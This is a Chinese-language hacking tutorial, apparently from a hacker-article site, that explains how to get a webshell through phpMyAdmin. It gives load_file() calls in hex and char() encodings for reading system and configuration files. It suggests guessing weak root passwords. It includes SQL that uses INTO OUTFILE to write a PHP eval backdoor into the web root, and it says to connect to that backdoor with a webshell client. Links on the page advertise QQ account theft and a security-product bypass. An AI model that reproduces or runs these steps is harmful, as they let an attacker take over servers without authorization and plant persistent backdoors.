关注我们
QRcode 邮件联系 新浪微博
首页 > 黑客文章 > 入侵检测 » 正文

phpmyadmin执行语句拿webshell

     条点评
后台-系统设置-扩展变量-手机广告位-内容正文顶部
很多时候,我们通过网站后台无法获得,然后我们就可以通过第3方漏洞来获得网站的webshell。

如果说服务器有安装phpmyadmin 且我们已知。网站的物理路径和phpmyadmin的帐号密码。

或者root密码可以通过以下方法进行尝试:

方法:load_file()



	
		C:\boot.ini
	
		load_file(0x433A5C626F6F742E696E69) 16进制 load_file(char(67,58,92,98,111,111,116,46,105,110,105)) ascii Conn.php config.php mainconn.php

很多情况有时候管理员没有修改root密码那么可以通过弱口令root root rrot 123 等 密码来进行尝试登录

 

 

当我们或者了phpmyadmin的最高权限root权限后,且已知网站的物理路径 (物理路径一般在网站后台会有显示 )

 

 

就可以通过一下sql语句来获得网站的webshell。

 

假设网站的物理路径是 C:\htdocs

就可以执行下面的SQL语句



	
		----start code--- Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); select cmd from a into outfile ' C:/htdocs/1.php'; (这里的要把网站的物理路径的\修改为/) Drop TABLE IF EXISTS a; ----end code---

 

12320131216181310

执行语句后如果提示以上信息说明SQL语句已经执行成功。然后就可以在网站根目录后面加上1.php就可以直接获得一句话。

然后通过一句话客户端来链接就可以获得网站的webshell了。

后台-系统设置-扩展变量-手机广告位-内容正文底部
本文标签:
MYSQL提权之langouster
返回列表
黑客技术qq盗号方法,盗qq号方法,盗qq号最简单盗号方法黑客技术qq盗号方法,盗qq号方法,盗qq号最简phpcms后台简单拿webshellphpcms后台简单拿webshell安全狗禁止IIS执行程序绕过安全狗禁止IIS执行程序绕过

已有条评论,欢迎点评!